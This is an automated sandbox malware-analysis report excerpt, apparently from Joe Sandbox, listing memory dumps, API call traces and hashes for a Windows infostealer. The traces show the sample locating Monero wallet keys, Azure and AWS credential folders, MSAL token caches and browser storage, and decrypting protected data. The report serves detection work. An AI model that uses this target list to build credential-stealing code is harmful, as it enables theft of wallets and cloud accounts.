                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Local$AllocCryptDataFreeUnprotect
                                  • String ID:
                                  • API String ID: 2068576380-0
                                  • Opcode ID: 44313844f5bf1487fd9991b4edc027425bba4237795302450bcc3403c9887a46
                                  • Instruction ID: 1faa801e319c1fed1f8be58c0188eb0a76583dca89af371d6069b2dc2a2f1f71
                                  • Opcode Fuzzy Hash: 44313844f5bf1487fd9991b4edc027425bba4237795302450bcc3403c9887a46
                                  • Instruction Fuzzy Hash: CC011DB5A4121AAFE710DBA4DC55FABB779EB44B00F108555EE04AB280D7B09A008BE1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmp
                                  Similarity
                                  • API ID:
                                  • String ID: 6&lo$BB]
                                  • API String ID: 0-2211810277
                                  • Opcode ID: f577ad3eb83b7f7d42fd0066800caebd705ec2e7e74b95c3cc084efdc720f67b
                                  • Instruction ID: bc9a86fbc41d432b06f1a8bd9e62d5d3c0890f14c631c61c14cb15ffd49e3807
                                  • Instruction Fuzzy Hash: 55B23BF3A0C2149FE304AE2DEC8567AFBE9EF94720F1A853DEAC4C3744E53558058696
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 57b57c54a120c7a77001b44c02d3aa429687941ce9bc4735c0a131463aaaca30
                                  • Instruction ID: 03e91249e6764037e17a22fe0e9ac8dba9dc31fd8c7f91d89c00c43aa9d5015f
                                  • Instruction Fuzzy Hash: 546147B3A082049FE304AE2DDC4576AB7D6EFD4720F1A453DEAC0C7344E9796C458796
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9478c27d8d46d17d6e0294926ac37dedbddbf9cae26495bc5e4fe49f80b32aca
                                  • Instruction ID: 48005839ba832035ceb20bbe5bbef6995670cbd21d7b0c55aaac9884d34cb822
                                  • Instruction Fuzzy Hash: A45157F3B182005FF7089929ED9477A77DADBD4310F2A853EEB89C7784E8795C058285
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a96826c8e2101663d0b73d820540f5d2c2ad7640ddfc5a488ce1efe0bb819a6b
                                  • Instruction ID: f6d44e018c64e08f6a0471d1952088c3c3434194b450f8f70faff57cca8109bf
                                  • Instruction Fuzzy Hash: 0B416EF3A082149BF3046A29EC857BAB7D6DB94720F1A833DDBC453B84D93D1C0582D6
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3ea2e17c8eb2934af48ee991e2447001b77a45c751d49086c75a4be35a929379
                                  • Instruction ID: e206d28c4d1988daafe3e241e90c374c75c3ffb0a4b093fcc041dab842d96bc3
                                  • Instruction Fuzzy Hash: CD416EF3E095109BF314AA2AEC4576BB7D7DBD4310F2B863DDAC097384E9794806C692
                                  APIs
                                  • lstrlen.KERNEL32(00000000), ref: 003F8636
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F866D
                                  • lstrcpy.KERNEL32(?,00000000), ref: 003F86AA
                                  • StrStrA.SHLWAPI(?,011B03B8), ref: 003F86CF
                                  • lstrcpyn.KERNEL32(006193D0,?,00000000), ref: 003F86EE
                                  • lstrlen.KERNEL32(?), ref: 003F8701
                                  • wsprintfA.USER32 ref: 003F8711
                                  • lstrcpy.KERNEL32(?,?), ref: 003F8727
                                  • StrStrA.SHLWAPI(?,011B03D0), ref: 003F8754
                                  • lstrcpy.KERNEL32(?,006193D0), ref: 003F87B4
                                  • StrStrA.SHLWAPI(?,011B06A0), ref: 003F87E1
                                  • lstrcpyn.KERNEL32(006193D0,?,00000000), ref: 003F8800
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmp
                                  Similarity
                                  • API ID: lstrcpy$lstrcpynlstrlen$wsprintf
                                  • String ID: %s%s
                                  • API String ID: 2672039231-3252725368
                                  • Opcode ID: 7376db06a3d9994d204709fba40877011de5eb70af0e203ec647ce1d95820363
                                  • Instruction ID: 84e4634cf5f3e60fddf7def287a33457c3f83d5ca98a8b444494f9531c0fb6c2
                                  • Instruction Fuzzy Hash: 2EF18371901118AFCB11DB74DD58AEAB7BAEF88340F19855AF909E7350DF70AE41CBA0
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003E1F9F
                                  • lstrlen.KERNEL32(011A8A18), ref: 003E1FAE
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003E1FDB
                                  • lstrcat.KERNEL32(00000000,?), ref: 003E1FE3
                                  • lstrlen.KERNEL32(00411794), ref: 003E1FEE
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003E200E
                                  • lstrcat.KERNEL32(00000000,00411794), ref: 003E201A
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003E2042
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003E204D
                                  • lstrlen.KERNEL32(00411794), ref: 003E2058
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003E2075
                                  • lstrcat.KERNEL32(00000000,00411794), ref: 003E2081
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003E20AC
                                  • lstrlen.KERNEL32(?), ref: 003E20E4
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003E2104
                                  • lstrcat.KERNEL32(00000000,?), ref: 003E2112
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003E2139
                                  • lstrlen.KERNEL32(00411794), ref: 003E214B
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003E216B
                                  • lstrcat.KERNEL32(00000000,00411794), ref: 003E2177
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003E219D
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003E21A8
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003E21D4
                                  • lstrlen.KERNEL32(?), ref: 003E21EA
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003E220A
                                  • lstrcat.KERNEL32(00000000,?), ref: 003E2218
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003E2242
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003E227F
                                  • lstrlen.KERNEL32(011AEEB8), ref: 003E228D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003E22B1
                                  • lstrcat.KERNEL32(00000000,011AEEB8), ref: 003E22B9
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003E22F7
                                  • lstrcat.KERNEL32(00000000), ref: 003E2304
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003E232D
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 003E2356
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003E2382
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003E23BF
                                  • DeleteFileA.KERNEL32(00000000), ref: 003E23F7
                                  • FindNextFileA.KERNEL32(00000000,?), ref: 003E2444
                                  • FindClose.KERNEL32(00000000), ref: 003E2453
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$lstrlen$File$Find$CloseCopyDeleteNext
                                  • String ID:
                                  • API String ID: 2857443207-0
                                  • Opcode ID: 9faad7c9d9eca9cbdb9db36efdb02d8a4ae714abaa87730546a2e570fa6be45e
                                  • Instruction ID: 41ca9840f00e0b3fb92ff302b272f9b56866727d226b3da9b427d179c835edf8
                                  • Instruction Fuzzy Hash: 47E162319102AA9FCB22EF76DC85ADF77BDAF04300F055225F905AB291DB74ED518BA0
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003F6445
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003F6480
                                  • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 003F64AA
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F64E1
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F6506
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003F650E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F6537
                                  Similarity
                                  • API ID: lstrcpy$FolderPathlstrcat
                                  • String ID: \..\
                                  • API String ID: 2938889746-4220915743
                                  • Opcode ID: 0ed86fff5e435e6b537436f128895078d2fbf49effdea357781bca0656562058
                                  • Instruction ID: 70c285fab2b2f25c701c818abd75259aa8107b90805363f00bf2a8882859b25f
                                  • Instruction Fuzzy Hash: 39F1CF7190025A9BCB23EF75D84AABF77B9AF04300F059229F905EB291DB34DD45CBA0
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003F43A3
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003F43D6
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003F43FE
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003F4409
                                  • lstrlen.KERNEL32(\storage\default\), ref: 003F4414
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F4431
                                  • lstrcat.KERNEL32(00000000,\storage\default\), ref: 003F443D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F4466
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003F4471
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F4498
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003F44D7
                                  • lstrcat.KERNEL32(00000000,?), ref: 003F44DF
                                  • lstrlen.KERNEL32(00411794), ref: 003F44EA
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F4507
                                  • lstrcat.KERNEL32(00000000,00411794), ref: 003F4513
                                  • lstrlen.KERNEL32(.metadata-v2), ref: 003F451E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F453B
                                  • lstrcat.KERNEL32(00000000,.metadata-v2), ref: 003F4547
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F456E
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003F45A0
                                  • GetFileAttributesA.KERNEL32(00000000), ref: 003F45A7
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003F4601
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003F462A
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003F4653
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003F467B
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003F46AF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$lstrlen$AttributesFile
                                  • String ID: .metadata-v2$\storage\default\
                                  • API String ID: 1033685851-762053450
                                  • Opcode ID: fbb1784cd1b253dcfcf00f30c1083671e507602f445844c8a21433c12282341d
                                  • Instruction ID: 80fbe67f2880f15308ba736bf1579444825ed2ea614b760f928eea0d34e99e9b
                                  • Opcode Fuzzy Hash: fbb1784cd1b253dcfcf00f30c1083671e507602f445844c8a21433c12282341d
                                  • Instruction Fuzzy Hash: BFB1E331A1025A9BCB23EF75DD49AAF77ADAF00700F055225F905EB291DF74ED118BA0
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003F57D5
                                  • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 003F5804
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F5835
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F585D
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003F5868
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F5890
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F58C8
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003F58D3
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F58F8
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003F592E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F5956
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003F5961
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F5988
                                  • lstrlen.KERNEL32(00411794), ref: 003F599A
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F59B9
                                  • lstrcat.KERNEL32(00000000,00411794), ref: 003F59C5
                                  • lstrlen.KERNEL32(011AED80), ref: 003F59D4
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F59F7
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003F5A02
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F5A2C
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F5A58
                                  • GetFileAttributesA.KERNEL32(00000000), ref: 003F5A5F
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003F5AB7
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003F5B2D
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003F5B56
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003F5B89
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F5BB5
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003F5BEF
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003F5C4C
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F5C70
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$lstrlen$AttributesFileFolderPath
                                  • String ID:
                                  • API String ID: 2428362635-0
                                  • Opcode ID: 8878de4a9d7815bbc34a94a3f8bbbb9e97d6b3448c597932ef33b9e713c1e59d
                                  • Instruction ID: 81465012aadac4d1bf9a14a0eae66e381ad59c4e8eeac4bf66dd334b34a634e9
                                  • Opcode Fuzzy Hash: 8878de4a9d7815bbc34a94a3f8bbbb9e97d6b3448c597932ef33b9e713c1e59d
                                  • Instruction Fuzzy Hash: 9702D371A0165A9FCB23EF79C889AAF7BB9AF04300F054229FA05D7291DB74DD41CB90
                                  APIs
                                    • Part of subcall function 003E1120: GetProcessHeap.KERNEL32(00000000,00000104), ref: 003E1135
                                    • Part of subcall function 003E1120: RtlAllocateHeap.NTDLL(00000000), ref: 003E113C
                                    • Part of subcall function 003E1120: RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 003E1159
                                    • Part of subcall function 003E1120: RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 003E1173
                                    • Part of subcall function 003E1120: RegCloseKey.ADVAPI32(?), ref: 003E117D
                                  • lstrcat.KERNEL32(?,00000000), ref: 003E11C0
                                  • lstrlen.KERNEL32(?), ref: 003E11CD
                                  • lstrcat.KERNEL32(?,.keys), ref: 003E11E8
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003E121F
                                  • lstrlen.KERNEL32(011A8A18), ref: 003E122D
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003E1251
                                  • lstrcat.KERNEL32(00000000,011A8A18), ref: 003E1259
                                  • lstrlen.KERNEL32(\Monero\wallet.keys), ref: 003E1264
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003E1288
                                  • lstrcat.KERNEL32(00000000,\Monero\wallet.keys), ref: 003E1294
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003E12BA
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003E12FF
                                  • lstrlen.KERNEL32(011AEEB8), ref: 003E130E
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003E1335
                                  • lstrcat.KERNEL32(00000000,?), ref: 003E133D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003E1378
                                  • lstrcat.KERNEL32(00000000), ref: 003E1385
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003E13AC
                                  • CopyFileA.KERNEL32(?,?,00000001), ref: 003E13D5
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003E1401
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003E143D
                                    • Part of subcall function 003FEDE0: lstrcpy.KERNEL32(00000000,?), ref: 003FEE12
                                  • DeleteFileA.KERNEL32(?), ref: 003E1471
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$lstrlen$FileHeap$AllocateCloseCopyDeleteOpenProcessQueryValue
                                  • String ID: .keys$\Monero\wallet.keys
                                  • API String ID: 2881711868-3586502688
                                  • Opcode ID: 8a0d6a70965d4a0f7fe4985ba24ff27aa75133e585210b142e4c691b6c60b3b1
                                  • Instruction ID: 5ed13b069a9694c1d65fe29650482e0fc905d9f9c5b22c9f504dcc27809e2763
                                  • Opcode Fuzzy Hash: 8a0d6a70965d4a0f7fe4985ba24ff27aa75133e585210b142e4c691b6c60b3b1
                                  • Instruction Fuzzy Hash: 20A1A271A002669BCB22EF76DC89ADF77B9AF44300F055625F905EB2D1DB70ED418BA0
                                  APIs
                                  • memset.MSVCRT ref: 003FE740
                                  • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 003FE769
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003FE79F
                                  • lstrcat.KERNEL32(?,00000000), ref: 003FE7AD
                                  • lstrcat.KERNEL32(?,\.azure\), ref: 003FE7C6
                                  • memset.MSVCRT ref: 003FE805
                                  • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 003FE82D
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003FE85F
                                  • lstrcat.KERNEL32(?,00000000), ref: 003FE86D
                                  • lstrcat.KERNEL32(?,\.aws\), ref: 003FE886
                                  • memset.MSVCRT ref: 003FE8C5
                                  • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 003FE8F1
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003FE920
                                  • lstrcat.KERNEL32(?,00000000), ref: 003FE92E
                                  • lstrcat.KERNEL32(?,\.IdentityService\), ref: 003FE947
                                  • memset.MSVCRT ref: 003FE986
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$memset$FolderPathlstrcpy
                                  • String ID: *.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                  • API String ID: 4067350539-3645552435
                                  • Opcode ID: 6b0d5864ac217c4d70ea77cf660bda3ff39bc5a0b4eecc52e57dc71444bcd5da
                                  • Instruction ID: 6391a7f839d05a9b5a278a5f960fe1592779870ea6fc62d7cb965e65fc14127c
